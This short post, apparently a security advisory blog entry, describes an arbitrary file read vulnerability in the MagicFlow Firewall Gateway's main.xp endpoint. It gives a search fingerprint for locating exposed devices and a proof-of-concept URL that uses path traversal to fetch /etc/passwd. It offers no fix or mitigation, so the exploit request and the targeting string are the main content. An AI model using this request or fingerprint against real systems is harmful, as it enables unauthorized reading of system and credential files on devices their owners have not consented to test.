Magicflow Firewall Gateway Main Xp Arbitrary File Reading Vulnerability
Magicflow Firewall Gateway Main Xp Arbitrary File Reading Vulnerability
MagicFlow Firewall Gateway main.xp arbitrary file reading vulnerability
Vulnerability Description
MagicFlow firewall gateway main.xp has arbitrary file reading vulnerability, and an attacker obtains sensitive files by constructing a specific URL.
Vulnerability Impact
MagicFlow Firewall Gateway
Network surveying and mapping
app=”MSA/1.0”
Vulnerability reappears
The login page is as follows
Construct POC
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
This post is licensed under CC BY 4.0 by the author.